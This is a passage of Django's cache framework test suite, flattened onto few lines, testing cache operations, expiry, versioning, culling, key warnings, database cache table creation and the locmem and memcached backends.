cache.set("hello1", "goodbye1") self.assertTrue(cache.has_key("hello1")) self.assertFalse(cache.has_key("goodbye1")) cache.set("no_expiry", "here", None) self.assertTrue(cache.has_key("no_expiry")) def test_in(self): # The in operator can be used to inspect cache contents cache.set("hello2", "goodbye2") self.assertIn("hello2", cache) self.assertNotIn("goodbye2", cache) def test_incr(self): # Cache values can be incremented cache.set('answer', 41) self.assertEqual(cache.incr('answer'), 42) self.assertEqual(cache.get('answer'), 42) self.assertEqual(cache.incr('answer', 10), 52) self.assertEqual(cache.get('answer'), 52) self.assertEqual(cache.incr('answer', -10), 42) with self.assertRaises(ValueError): cache.incr('does_not_exist') def test_decr(self): # Cache values can be decremented cache.set('answer', 43) self.assertEqual(cache.decr('answer'), 42) self.assertEqual(cache.get('answer'), 42) self.assertEqual(cache.decr('answer', 10), 32) self.assertEqual(cache.get('answer'), 32) self.assertEqual(cache.decr('answer', -10), 42) with self.assertRaises(ValueError): cache.decr('does_not_exist') def test_close(self): self.assertTrue(hasattr(cache, 'close')) cache.close() def test_data_types(self): # Many different data types can be cached stuff = { 'string': 'this is a string', 'int': 42, 'list': [1, 2, 3, 4], 'tuple': (1, 2, 3, 4), 'dict': {'A': 1, 'B': 2}, 'function': f, 'class': C, } cache.set("stuff", stuff) self.assertEqual(cache.get("stuff"), stuff) def test_cache_read_for_model_instance(self): # Don't want fields with callable as default to be called on cache read expensive_calculation.num_runs = 0 Poll.objects.all().delete() my_poll = Poll.objects.create(question="Well?") self.assertEqual(Poll.objects.count(), 1) pub_date = my_poll.pub_date cache.set('question', my_poll) cached_poll = cache.get('question') self.assertEqual(cached_poll.pub_date, pub_date) # We only want the default expensive calculation run once self.assertEqual(expensive_calculation.num_runs, 1) def 
test_cache_write_for_model_instance_with_deferred(self): # Don't want fields with callable as default to be called on cache write expensive_calculation.num_runs = 0 Poll.objects.all().delete() Poll.objects.create(question="What?") self.assertEqual(expensive_calculation.num_runs, 1) defer_qs = Poll.objects.all().defer('question') self.assertEqual(defer_qs.count(), 1) self.assertEqual(expensive_calculation.num_runs, 1) cache.set('deferred_queryset', defer_qs) # cache set should not re-evaluate default functions self.assertEqual(expensive_calculation.num_runs, 1) def test_cache_read_for_model_instance_with_deferred(self): # Don't want fields with callable as default to be called on cache read expensive_calculation.num_runs = 0 Poll.objects.all().delete() Poll.objects.create(question="What?") self.assertEqual(expensive_calculation.num_runs, 1) defer_qs = Poll.objects.all().defer('question') self.assertEqual(defer_qs.count(), 1) cache.set('deferred_queryset', defer_qs) self.assertEqual(expensive_calculation.num_runs, 1) runs_before_cache_read = expensive_calculation.num_runs cache.get('deferred_queryset') # We only want the default expensive calculation run on creation and set self.assertEqual(expensive_calculation.num_runs, runs_before_cache_read) def test_expiration(self): # Cache values can be set to expire cache.set('expire1', 'very quickly', 1) cache.set('expire2', 'very quickly', 1) cache.set('expire3', 'very quickly', 1) time.sleep(2) self.assertIsNone(cache.get("expire1")) cache.add("expire2", "newvalue") self.assertEqual(cache.get("expire2"), "newvalue") self.assertFalse(cache.has_key("expire3")) def test_unicode(self): # Unicode values can be cached stuff = { 'ascii': 'ascii_value', 'unicode_ascii': 'Iñtërnâtiônàlizætiøn1', 'Iñtërnâtiônàlizætiøn': 'Iñtërnâtiônàlizætiøn2', 'ascii2': {'x': 1} } # Test `set` for (key, value) in stuff.items(): with self.subTest(key=key): cache.set(key, value) self.assertEqual(cache.get(key), value) # Test `add` for (key, value) in 
stuff.items(): with self.subTest(key=key): cache.delete(key) cache.add(key, value) self.assertEqual(cache.get(key), value) # Test `set_many` for (key, value) in stuff.items(): cache.delete(key) cache.set_many(stuff) for (key, value) in stuff.items(): with self.subTest(key=key): self.assertEqual(cache.get(key), value) def test_binary_string(self): # Binary strings should be cacheable from zlib import compress, decompress value = 'value_to_be_compressed' compressed_value = compress(value.encode()) # Test set cache.set('binary1', compressed_value) compressed_result = cache.get('binary1') self.assertEqual(compressed_value, compressed_result) self.assertEqual(value, decompress(compressed_result).decode()) # Test add cache.add('binary1-add', compressed_value) compressed_result = cache.get('binary1-add') self.assertEqual(compressed_value, compressed_result) self.assertEqual(value, decompress(compressed_result).decode()) # Test set_many cache.set_many({'binary1-set_many': compressed_value}) compressed_result = cache.get('binary1-set_many') self.assertEqual(compressed_value, compressed_result) self.assertEqual(value, decompress(compressed_result).decode()) def test_set_many(self): # Multiple keys can be set using set_many cache.set_many({"key1": "spam", "key2": "eggs"}) self.assertEqual(cache.get("key1"), "spam") self.assertEqual(cache.get("key2"), "eggs") def test_set_many_returns_empty_list_on_success(self): """set_many() returns an empty list when all keys are inserted.""" failing_keys = cache.set_many({'key1': 'spam', 'key2': 'eggs'}) self.assertEqual(failing_keys, []) def test_set_many_expiration(self): # set_many takes a second ``timeout`` parameter cache.set_many({"key1": "spam", "key2": "eggs"}, 1) time.sleep(2) self.assertIsNone(cache.get("key1")) self.assertIsNone(cache.get("key2")) def test_delete_many(self): # Multiple keys can be deleted using delete_many cache.set("key1", "spam") cache.set("key2", "eggs") cache.set("key3", "ham") cache.delete_many(["key1", 
"key2"]) self.assertIsNone(cache.get("key1")) self.assertIsNone(cache.get("key2")) self.assertEqual(cache.get("key3"), "ham") def test_clear(self): # The cache can be emptied using clear cache.set("key1", "spam") cache.set("key2", "eggs") cache.clear() self.assertIsNone(cache.get("key1")) self.assertIsNone(cache.get("key2")) def test_long_timeout(self): """ Followe memcached's convention where a timeout greater than 30 days is treated as an absolute expiration timestamp instead of a relative offset (#12399). """ cache.set('key1', 'eggs', 60 * 60 * 24 * 30 + 1) # 30 days + 1 second self.assertEqual(cache.get('key1'), 'eggs') cache.add('key2', 'ham', 60 * 60 * 24 * 30 + 1) self.assertEqual(cache.get('key2'), 'ham') cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, 60 * 60 * 24 * 30 + 1) self.assertEqual(cache.get('key3'), 'sausage') self.assertEqual(cache.get('key4'), 'lobster bisque') def test_forever_timeout(self): """ Passing in None into timeout results in a value that is cached forever """ cache.set('key1', 'eggs', None) self.assertEqual(cache.get('key1'), 'eggs') cache.add('key2', 'ham', None) self.assertEqual(cache.get('key2'), 'ham') added = cache.add('key1', 'new eggs', None) self.assertIs(added, False) self.assertEqual(cache.get('key1'), 'eggs') cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, None) self.assertEqual(cache.get('key3'), 'sausage') self.assertEqual(cache.get('key4'), 'lobster bisque') def test_zero_timeout(self): """ Passing in zero into timeout results in a value that is not cached """ cache.set('key1', 'eggs', 0) self.assertIsNone(cache.get('key1')) cache.add('key2', 'ham', 0) self.assertIsNone(cache.get('key2')) cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, 0) self.assertIsNone(cache.get('key3')) self.assertIsNone(cache.get('key4')) def test_float_timeout(self): # Make sure a timeout given as a float doesn't crash anything. 
cache.set("key1", "spam", 100.2) self.assertEqual(cache.get("key1"), "spam") def _perform_cull_test(self, cull_cache, initial_count, final_count): # Create initial cache key entries. This will overflow the cache, # causing a cull. for i in range(1, initial_count): cull_cache.set('cull%d' % i, 'value', 1000) count = 0 # Count how many keys are left in the cache. for i in range(1, initial_count): if cull_cache.has_key('cull%d' % i): count += 1 self.assertEqual(count, final_count) def test_cull(self): self._perform_cull_test(caches['cull'], 50, 29) def test_zero_cull(self): self._perform_cull_test(caches['zero_cull'], 50, 19) def _perform_invalid_key_test(self, key, expected_warning): """ All the builtin backends (except memcached, see below) should warn on keys that would be refused by memcached. This encourages portable caching code without making it too difficult to use production backends with more liberal key rules. Refs #6447. """ # mimic custom ``make_key`` method being defined since the default will # never show the below warnings def func(key, *args): return key old_func = cache.key_func cache.key_func = func try: with warnings.catch_warnings(record=True) as w: warnings.simplefilter("always") cache.set(key, 'value') self.assertEqual(len(w), 1) self.assertIsInstance(w[0].message, CacheKeyWarning) self.assertEqual(str(w[0].message.args[0]), expected_warning) finally: cache.key_func = old_func def test_invalid_key_characters(self): # memcached doesn't allow whitespace or control characters in keys. key = 'key with spaces and 清' self._perform_invalid_key_test(key, KEY_ERRORS_WITH_MEMCACHED_MSG % key) def test_invalid_key_length(self): # memcached limits key length to 250. 
key = ('a' * 250) + '清' expected_warning = ( 'Cache key will cause errors if used with memcached: ' '%r (longer than %s)' % (key, 250) ) self._perform_invalid_key_test(key, expected_warning) def test_cache_versioning_get_set(self): # set, using default version = 1 cache.set('answer1', 42) self.assertEqual(cache.get('answer1'), 42) self.assertEqual(cache.get('answer1', version=1), 42) self.assertIsNone(cache.get('answer1', version=2)) self.assertIsNone(caches['v2'].get('answer1')) self.assertEqual(caches['v2'].get('answer1', version=1), 42) self.assertIsNone(caches['v2'].get('answer1', version=2)) # set, default version = 1, but manually override version = 2 cache.set('answer2', 42, version=2) self.assertIsNone(cache.get('answer2')) self.assertIsNone(cache.get('answer2', version=1)) self.assertEqual(cache.get('answer2', version=2), 42) self.assertEqual(caches['v2'].get('answer2'), 42) self.assertIsNone(caches['v2'].get('answer2', version=1)) self.assertEqual(caches['v2'].get('answer2', version=2), 42) # v2 set, using default version = 2 caches['v2'].set('answer3', 42) self.assertIsNone(cache.get('answer3')) self.assertIsNone(cache.get('answer3', version=1)) self.assertEqual(cache.get('answer3', version=2), 42) self.assertEqual(caches['v2'].get('answer3'), 42) self.assertIsNone(caches['v2'].get('answer3', version=1)) self.assertEqual(caches['v2'].get('answer3', version=2), 42) # v2 set, default version = 2, but manually override version = 1 caches['v2'].set('answer4', 42, version=1) self.assertEqual(cache.get('answer4'), 42) self.assertEqual(cache.get('answer4', version=1), 42) self.assertIsNone(cache.get('answer4', version=2)) self.assertIsNone(caches['v2'].get('answer4')) self.assertEqual(caches['v2'].get('answer4', version=1), 42) self.assertIsNone(caches['v2'].get('answer4', version=2)) def test_cache_versioning_add(self): # add, default version = 1, but manually override version = 2 cache.add('answer1', 42, version=2) self.assertIsNone(cache.get('answer1', 
version=1)) self.assertEqual(cache.get('answer1', version=2), 42) cache.add('answer1', 37, version=2) self.assertIsNone(cache.get('answer1', version=1)) self.assertEqual(cache.get('answer1', version=2), 42) cache.add('answer1', 37, version=1) self.assertEqual(cache.get('answer1', version=1), 37) self.assertEqual(cache.get('answer1', version=2), 42) # v2 add, using default version = 2 caches['v2'].add('answer2', 42) self.assertIsNone(cache.get('answer2', version=1)) self.assertEqual(cache.get('answer2', version=2), 42) caches['v2'].add('answer2', 37) self.assertIsNone(cache.get('answer2', version=1)) self.assertEqual(cache.get('answer2', version=2), 42) caches['v2'].add('answer2', 37, version=1) self.assertEqual(cache.get('answer2', version=1), 37) self.assertEqual(cache.get('answer2', version=2), 42) # v2 add, default version = 2, but manually override version = 1 caches['v2'].add('answer3', 42, version=1) self.assertEqual(cache.get('answer3', version=1), 42) self.assertIsNone(cache.get('answer3', version=2)) caches['v2'].add('answer3', 37, version=1) self.assertEqual(cache.get('answer3', version=1), 42) self.assertIsNone(cache.get('answer3', version=2)) caches['v2'].add('answer3', 37) self.assertEqual(cache.get('answer3', version=1), 42) self.assertEqual(cache.get('answer3', version=2), 37) def test_cache_versioning_has_key(self): cache.set('answer1', 42) # has_key self.assertTrue(cache.has_key('answer1')) self.assertTrue(cache.has_key('answer1', version=1)) self.assertFalse(cache.has_key('answer1', version=2)) self.assertFalse(caches['v2'].has_key('answer1')) self.assertTrue(caches['v2'].has_key('answer1', version=1)) self.assertFalse(caches['v2'].has_key('answer1', version=2)) def test_cache_versioning_delete(self): cache.set('answer1', 37, version=1) cache.set('answer1', 42, version=2) cache.delete('answer1') self.assertIsNone(cache.get('answer1', version=1)) self.assertEqual(cache.get('answer1', version=2), 42) cache.set('answer2', 37, version=1) 
cache.set('answer2', 42, version=2) cache.delete('answer2', version=2) self.assertEqual(cache.get('answer2', version=1), 37) self.assertIsNone(cache.get('answer2', version=2)) cache.set('answer3', 37, version=1) cache.set('answer3', 42, version=2) caches['v2'].delete('answer3') self.assertEqual(cache.get('answer3', version=1), 37) self.assertIsNone(cache.get('answer3', version=2)) cache.set('answer4', 37, version=1) cache.set('answer4', 42, version=2) caches['v2'].delete('answer4', version=1) self.assertIsNone(cache.get('answer4', version=1)) self.assertEqual(cache.get('answer4', version=2), 42) def test_cache_versioning_incr_decr(self): cache.set('answer1', 37, version=1) cache.set('answer1', 42, version=2) cache.incr('answer1') self.assertEqual(cache.get('answer1', version=1), 38) self.assertEqual(cache.get('answer1', version=2), 42) cache.decr('answer1') self.assertEqual(cache.get('answer1', version=1), 37) self.assertEqual(cache.get('answer1', version=2), 42) cache.set('answer2', 37, version=1) cache.set('answer2', 42, version=2) cache.incr('answer2', version=2) self.assertEqual(cache.get('answer2', version=1), 37) self.assertEqual(cache.get('answer2', version=2), 43) cache.decr('answer2', version=2) self.assertEqual(cache.get('answer2', version=1), 37) self.assertEqual(cache.get('answer2', version=2), 42) cache.set('answer3', 37, version=1) cache.set('answer3', 42, version=2) caches['v2'].incr('answer3') self.assertEqual(cache.get('answer3', version=1), 37) self.assertEqual(cache.get('answer3', version=2), 43) caches['v2'].decr('answer3') self.assertEqual(cache.get('answer3', version=1), 37) self.assertEqual(cache.get('answer3', version=2), 42) cache.set('answer4', 37, version=1) cache.set('answer4', 42, version=2) caches['v2'].incr('answer4', version=1) self.assertEqual(cache.get('answer4', version=1), 38) self.assertEqual(cache.get('answer4', version=2), 42) caches['v2'].decr('answer4', version=1) self.assertEqual(cache.get('answer4', version=1), 37) 
self.assertEqual(cache.get('answer4', version=2), 42) def test_cache_versioning_get_set_many(self): # set, using default version = 1 cache.set_many({'ford1': 37, 'arthur1': 42}) self.assertEqual(cache.get_many(['ford1', 'arthur1']), {'ford1': 37, 'arthur1': 42}) self.assertEqual(cache.get_many(['ford1', 'arthur1'], version=1), {'ford1': 37, 'arthur1': 42}) self.assertEqual(cache.get_many(['ford1', 'arthur1'], version=2), {}) self.assertEqual(caches['v2'].get_many(['ford1', 'arthur1']), {}) self.assertEqual(caches['v2'].get_many(['ford1', 'arthur1'], version=1), {'ford1': 37, 'arthur1': 42}) self.assertEqual(caches['v2'].get_many(['ford1', 'arthur1'], version=2), {}) # set, default version = 1, but manually override version = 2 cache.set_many({'ford2': 37, 'arthur2': 42}, version=2) self.assertEqual(cache.get_many(['ford2', 'arthur2']), {}) self.assertEqual(cache.get_many(['ford2', 'arthur2'], version=1), {}) self.assertEqual(cache.get_many(['ford2', 'arthur2'], version=2), {'ford2': 37, 'arthur2': 42}) self.assertEqual(caches['v2'].get_many(['ford2', 'arthur2']), {'ford2': 37, 'arthur2': 42}) self.assertEqual(caches['v2'].get_many(['ford2', 'arthur2'], version=1), {}) self.assertEqual(caches['v2'].get_many(['ford2', 'arthur2'], version=2), {'ford2': 37, 'arthur2': 42}) # v2 set, using default version = 2 caches['v2'].set_many({'ford3': 37, 'arthur3': 42}) self.assertEqual(cache.get_many(['ford3', 'arthur3']), {}) self.assertEqual(cache.get_many(['ford3', 'arthur3'], version=1), {}) self.assertEqual(cache.get_many(['ford3', 'arthur3'], version=2), {'ford3': 37, 'arthur3': 42}) self.assertEqual(caches['v2'].get_many(['ford3', 'arthur3']), {'ford3': 37, 'arthur3': 42}) self.assertEqual(caches['v2'].get_many(['ford3', 'arthur3'], version=1), {}) self.assertEqual(caches['v2'].get_many(['ford3', 'arthur3'], version=2), {'ford3': 37, 'arthur3': 42}) # v2 set, default version = 2, but manually override version = 1 caches['v2'].set_many({'ford4': 37, 'arthur4': 42}, 
version=1) self.assertEqual(cache.get_many(['ford4', 'arthur4']), {'ford4': 37, 'arthur4': 42}) self.assertEqual(cache.get_many(['ford4', 'arthur4'], version=1), {'ford4': 37, 'arthur4': 42}) self.assertEqual(cache.get_many(['ford4', 'arthur4'], version=2), {}) self.assertEqual(caches['v2'].get_many(['ford4', 'arthur4']), {}) self.assertEqual(caches['v2'].get_many(['ford4', 'arthur4'], version=1), {'ford4': 37, 'arthur4': 42}) self.assertEqual(caches['v2'].get_many(['ford4', 'arthur4'], version=2), {}) def test_incr_version(self): cache.set('answer', 42, version=2) self.assertIsNone(cache.get('answer')) self.assertIsNone(cache.get('answer', version=1)) self.assertEqual(cache.get('answer', version=2), 42) self.assertIsNone(cache.get('answer', version=3)) self.assertEqual(cache.incr_version('answer', version=2), 3) self.assertIsNone(cache.get('answer')) self.assertIsNone(cache.get('answer', version=1)) self.assertIsNone(cache.get('answer', version=2)) self.assertEqual(cache.get('answer', version=3), 42) caches['v2'].set('answer2', 42) self.assertEqual(caches['v2'].get('answer2'), 42) self.assertIsNone(caches['v2'].get('answer2', version=1)) self.assertEqual(caches['v2'].get('answer2', version=2), 42) self.assertIsNone(caches['v2'].get('answer2', version=3)) self.assertEqual(caches['v2'].incr_version('answer2'), 3) self.assertIsNone(caches['v2'].get('answer2')) self.assertIsNone(caches['v2'].get('answer2', version=1)) self.assertIsNone(caches['v2'].get('answer2', version=2)) self.assertEqual(caches['v2'].get('answer2', version=3), 42) with self.assertRaises(ValueError): cache.incr_version('does_not_exist') def test_decr_version(self): cache.set('answer', 42, version=2) self.assertIsNone(cache.get('answer')) self.assertIsNone(cache.get('answer', version=1)) self.assertEqual(cache.get('answer', version=2), 42) self.assertEqual(cache.decr_version('answer', version=2), 1) self.assertEqual(cache.get('answer'), 42) self.assertEqual(cache.get('answer', version=1), 42) 
self.assertIsNone(cache.get('answer', version=2)) caches['v2'].set('answer2', 42) self.assertEqual(caches['v2'].get('answer2'), 42) self.assertIsNone(caches['v2'].get('answer2', version=1)) self.assertEqual(caches['v2'].get('answer2', version=2), 42) self.assertEqual(caches['v2'].decr_version('answer2'), 1) self.assertIsNone(caches['v2'].get('answer2')) self.assertEqual(caches['v2'].get('answer2', version=1), 42) self.assertIsNone(caches['v2'].get('answer2', version=2)) with self.assertRaises(ValueError): cache.decr_version('does_not_exist', version=2) def test_custom_key_func(self): # Two caches with different key functions aren't visible to each other cache.set('answer1', 42) self.assertEqual(cache.get('answer1'), 42) self.assertIsNone(caches['custom_key'].get('answer1')) self.assertIsNone(caches['custom_key2'].get('answer1')) caches['custom_key'].set('answer2', 42) self.assertIsNone(cache.get('answer2')) self.assertEqual(caches['custom_key'].get('answer2'), 42) self.assertEqual(caches['custom_key2'].get('answer2'), 42) def test_cache_write_unpicklable_object(self): update_middleware = UpdateCacheMiddleware() update_middleware.cache = cache fetch_middleware = FetchFromCacheMiddleware() fetch_middleware.cache = cache request = self.factory.get('/cache/test') request._cache_update_cache = True get_cache_data = FetchFromCacheMiddleware().process_request(request) self.assertIsNone(get_cache_data) response = HttpResponse() content = 'Testing cookie serialization.' 
response.content = content response.set_cookie('foo', 'bar') update_middleware.process_response(request, response) get_cache_data = fetch_middleware.process_request(request) self.assertIsNotNone(get_cache_data) self.assertEqual(get_cache_data.content, content.encode()) self.assertEqual(get_cache_data.cookies, response.cookies) update_middleware.process_response(request, get_cache_data) get_cache_data = fetch_middleware.process_request(request) self.assertIsNotNone(get_cache_data) self.assertEqual(get_cache_data.content, content.encode()) self.assertEqual(get_cache_data.cookies, response.cookies) def test_add_fail_on_pickleerror(self): # Shouldn't fail silently if trying to cache an unpicklable type. with self.assertRaises(pickle.PickleError): cache.add('unpicklable', Unpicklable()) def test_set_fail_on_pickleerror(self): with self.assertRaises(pickle.PickleError): cache.set('unpicklable', Unpicklable()) def test_get_or_set(self): self.assertIsNone(cache.get('projector')) self.assertEqual(cache.get_or_set('projector', 42), 42) self.assertEqual(cache.get('projector'), 42) self.assertEqual(cache.get_or_set('null', None), None) def test_get_or_set_callable(self): def my_callable(): return 'value' self.assertEqual(cache.get_or_set('mykey', my_callable), 'value') self.assertEqual(cache.get_or_set('mykey', my_callable()), 'value') def test_get_or_set_callable_returning_none(self): self.assertIsNone(cache.get_or_set('mykey', lambda: None)) # Previous get_or_set() doesn't store None in the cache. 
    def setUp(self):
        # The super call needs to happen first for the settings override.
        super().setUp()
        self.create_table()
super().tearDown() self.drop_table() def create_table(self): management.call_command('createcachetable', verbosity=0) def drop_table(self): with connection.cursor() as cursor: table_name = connection.ops.quote_name('test cache table') cursor.execute('DROP TABLE %s' % table_name) def test_zero_cull(self): self._perform_cull_test(caches['zero_cull'], 50, 18) def test_second_call_doesnt_crash(self): out = io.StringIO() management.call_command('createcachetable', stdout=out) self.assertEqual(out.getvalue(), "Cache table 'test cache table' already exists.\n" * len(settings.CACHES)) @override_settings(CACHES=caches_setting_for_tests( BACKEND='django.core.cache.backends.db.DatabaseCache', # Use another table name to avoid the 'table already exists' message. LOCATION='createcachetable_dry_run_mode' )) def test_createcachetable_dry_run_mode(self): out = io.StringIO() management.call_command('createcachetable', dry_run=True, stdout=out) output = out.getvalue() self.assertTrue(output.startswith("CREATE TABLE")) def test_createcachetable_with_table_argument(self): """ Delete and recreate cache table with legacy behavior (explicitly specifying the table name). 
""" self.drop_table() out = io.StringIO() management.call_command( 'createcachetable', 'test cache table', verbosity=2, stdout=out, ) self.assertEqual(out.getvalue(), "Cache table 'test cache table' created.\n") @override_settings(USE_TZ=True) class DBCacheWithTimeZoneTests(DBCacheTests): pass class DBCacheRouter: """A router that puts the cache table on the 'other' database.""" def db_for_read(self, model, **hints): if model._meta.app_label == 'django_cache': return 'other' return None def db_for_write(self, model, **hints): if model._meta.app_label == 'django_cache': return 'other' return None def allow_migrate(self, db, app_label, **hints): if app_label == 'django_cache': return db == 'other' return None @override_settings( CACHES={ 'default': { 'BACKEND': 'django.core.cache.backends.db.DatabaseCache', 'LOCATION': 'my_cache_table', }, }, ) class CreateCacheTableForDBCacheTests(TestCase): multi_db = True @override_settings(DATABASE_ROUTERS=[DBCacheRouter()]) def test_createcachetable_observes_database_router(self): # cache table should not be created on 'default' with self.assertNumQueries(0, using='default'): management.call_command('createcachetable', database='default', verbosity=0) # cache table should be created on 'other' # Queries: # 1: check table doesn't already exist # 2: create savepoint (if transactional DDL is supported) # 3: create the table # 4: create the index # 5: release savepoint (if transactional DDL is supported) num = 5 if connections['other'].features.can_rollback_ddl else 3 with self.assertNumQueries(num, using='other'): management.call_command('createcachetable', database='other', verbosity=0) class PicklingSideEffect: def __init__(self, cache): self.cache = cache self.locked = False def __getstate__(self): self.locked = self.cache._lock.locked() return {} limit_locmem_entries = override_settings(CACHES=caches_setting_for_tests( BACKEND='django.core.cache.backends.locmem.LocMemCache', OPTIONS={'MAX_ENTRIES': 9}, )) 
@override_settings(CACHES=caches_setting_for_tests( BACKEND='django.core.cache.backends.locmem.LocMemCache', )) class LocMemCacheTests(BaseCacheTests, TestCase): def setUp(self): super().setUp() # LocMem requires a hack to make the other caches # share a data store with the 'normal' cache. caches['prefix']._cache = cache._cache caches['prefix']._expire_info = cache._expire_info caches['v2']._cache = cache._cache caches['v2']._expire_info = cache._expire_info caches['custom_key']._cache = cache._cache caches['custom_key']._expire_info = cache._expire_info caches['custom_key2']._cache = cache._cache caches['custom_key2']._expire_info = cache._expire_info @override_settings(CACHES={ 'default': {'BACKEND': 'django.core.cache.backends.locmem.LocMemCache'}, 'other': { 'BACKEND': 'django.core.cache.backends.locmem.LocMemCache', 'LOCATION': 'other' }, }) def test_multiple_caches(self): "Multiple locmem caches are isolated" cache.set('value', 42) self.assertEqual(caches['default'].get('value'), 42) self.assertIsNone(caches['other'].get('value')) def test_locking_on_pickle(self): """#20613/#18541 -- Ensures pickling is done outside of the lock.""" bad_obj = PicklingSideEffect(cache) cache.set('set', bad_obj) self.assertFalse(bad_obj.locked, "Cache was locked during pickling") cache.add('add', bad_obj) self.assertFalse(bad_obj.locked, "Cache was locked during pickling") def test_incr_decr_timeout(self): """incr/decr does not modify expiry time (matches memcached behavior)""" key = 'value' _key = cache.make_key(key) cache.set(key, 1, timeout=cache.default_timeout * 10) expire = cache._expire_info[_key] cache.incr(key) self.assertEqual(expire, cache._expire_info[_key]) cache.decr(key) self.assertEqual(expire, cache._expire_info[_key]) @limit_locmem_entries def test_lru_get(self): """get() moves cache keys.""" for key in range(9): cache.set(key, key, timeout=None) for key in range(6): self.assertEqual(cache.get(key), key) cache.set(9, 9, timeout=None) for key in range(6): 
self.assertEqual(cache.get(key), key) for key in range(6, 9): self.assertIsNone(cache.get(key)) self.assertEqual(cache.get(9), 9) @limit_locmem_entries def test_lru_set(self): """set() moves cache keys.""" for key in range(9): cache.set(key, key, timeout=None) for key in range(3, 9): cache.set(key, key, timeout=None) cache.set(9, 9, timeout=None) for key in range(3, 10): self.assertEqual(cache.get(key), key) for key in range(3): self.assertIsNone(cache.get(key)) @limit_locmem_entries def test_lru_incr(self): """incr() moves cache keys.""" for key in range(9): cache.set(key, key, timeout=None) for key in range(6): cache.incr(key) cache.set(9, 9, timeout=None) for key in range(6): self.assertEqual(cache.get(key), key + 1) for key in range(6, 9): self.assertIsNone(cache.get(key)) self.assertEqual(cache.get(9), 9) # memcached backend isn't guaranteed to be available. # To check the memcached backend, the test settings file will # need to contain at least one cache backend setting that points at # your memcache server. configured_caches = {} for _cache_params in settings.CACHES.values(): configured_caches[_cache_params['BACKEND']] = _cache_params MemcachedCache_params = configured_caches.get('django.core.cache.backends.memcached.MemcachedCache') PyLibMCCache_params = configured_caches.get('django.core.cache.backends.memcached.PyLibMCCache') # The memcached backends don't support cull-related options like `MAX_ENTRIES`. memcached_excluded_caches = {'cull', 'zero_cull'} class BaseMemcachedTests(BaseCacheTests): # By default it's assumed that the client doesn't clean up connections # properly, in which case the backend must do so after each request. 
should_disconnect_on_close = True def test_location_multiple_servers(self): locations = [ ['server1.tld', 'server2:11211'], 'server1.tld;server2:11211', 'server1.tld,server2:11211', ] for location in locations: with self.subTest(location=location): params = {'BACKEND': self.base_params['BACKEND'], 'LOCATION': location} with self.settings(CACHES={'default': params}): self.assertEqual(cache._servers, ['server1.tld', 'server2:11211']) def test_invalid_key_characters(self): """ On memcached, we don't introduce a duplicate key validation step (for speed reasons), we just let the memcached API library raise its own exception on bad keys. Refs #6447. In order to be memcached-API-library agnostic, we only assert that a generic exception of some kind is raised. """ # memcached does not allow whitespace or control characters in keys # when using the ascii protocol. with self.assertRaises(Exception): cache.set('key with spaces', 'value') def test_invalid_key_length(self): # memcached limits key length to 250 with self.assertRaises(Exception): cache.set('a' * 251, 'value') def test_default_never_expiring_timeout(self): # Regression test for #22845 with self.settings(CACHES=caches_setting_for_tests( base=self.base_params, exclude=memcached_excluded_caches, TIMEOUT=None)): cache.set('infinite_foo', 'bar') self.assertEqual(cache.get('infinite_foo'), 'bar') def test_default_far_future_timeout(self): # Regression test for #22845 with self.settings(CACHES=caches_setting_for_tests( base=self.base_params, exclude=memcached_excluded_caches, # 60*60*24*365, 1 year TIMEOUT=31536000)): cache.set('future_foo', 'bar') self.assertEqual(cache.get('future_foo'), 'bar') def test_cull(self): # culling isn't implemented, memcached deals with it. pass def test_zero_cull(self): # culling isn't implemented, memcached deals with it. pass def test_memcached_deletes_key_on_failed_set(self): # By default memcached allows objects up to 1MB. 
For the cache_db session # backend to always use the current session, memcached needs to delete # the old key if it fails to set. # pylibmc doesn't seem to have SERVER_MAX_VALUE_LENGTH as far as I can # tell from a quick check of its source code. This is falling back to # the default value exposed by python-memcached on my system. max_value_length = getattr(cache._lib, 'SERVER_MAX_VALUE_LENGTH', 1048576) cache.set('small_value', 'a') self.assertEqual(cache.get('small_value'), 'a') large_value = 'a' * (max_value_length + 1) try: cache.set('small_value', large_value) except Exception: # Some clients (e.g. pylibmc) raise when the value is too large, # while others (e.g. python-memcached) intentionally return True # indicating success. This test is primarily checking that the key # was deleted, so the return/exception behavior for the set() # itself is not important. pass # small_value should be deleted, or set if configured to accept larger values value = cache.get('small_value') self.assertTrue(value is None or value == large_value) def test_close(self): # For clients that don't manage their connections properly, the # connection is closed when the request is complete. 
signals.request_finished.disconnect(close_old_connections) try: with mock.patch.object(cache._lib.Client, 'disconnect_all', autospec=True) as mock_disconnect: signals.request_finished.send(self.__class__) self.assertIs(mock_disconnect.called, self.should_disconnect_on_close) finally: signals.request_finished.connect(close_old_connections) def test_set_many_returns_failing_keys(self): def fail_set_multi(mapping, *args, **kwargs): return mapping.keys() with mock.patch('%s.Client.set_multi' % self.client_library_name, side_effect=fail_set_multi): failing_keys = cache.set_many({'key': 'value'}) self.assertEqual(failing_keys, ['key']) @unittest.skipUnless(MemcachedCache_params, "MemcachedCache backend not configured") @override_settings(CACHES=caches_setting_for_tests( base=MemcachedCache_params, exclude=memcached_excluded_caches, )) class MemcachedCacheTests(BaseMemcachedTests, TestCase): base_params = MemcachedCache_params client_library_name = 'memcache' def test_memcached_uses_highest_pickle_version(self): # Regression test for #19810 for cache_key in settings.CACHES: with self.subTest(cache_key=cache_key): self.assertEqual(caches[cache_key]._cache.pickleProtocol, pickle.HIGHEST_PROTOCOL) @override_settings(CACHES=caches_setting_for_tests( base=MemcachedCache_params, exclude=memcached_excluded_caches, OPTIONS={'server_max_value_length': 9999}, )) def test_memcached_options(self): self.assertEqual(cache._cache.server_max_value_length, 9999) @unittest.skipUnless(PyLibMCCache_params, "PyLibMCCache backend not configured") @override_settings(CACHES=caches_setting_for_tests( base=PyLibMCCache_params, exclude=memcached_excluded_caches, )) class PyLibMCCacheTests(BaseMemcachedTests, TestCase): base_params = PyLibMCCache_params client_library_name = 'pylibmc' # libmemcached manages its own connections. 
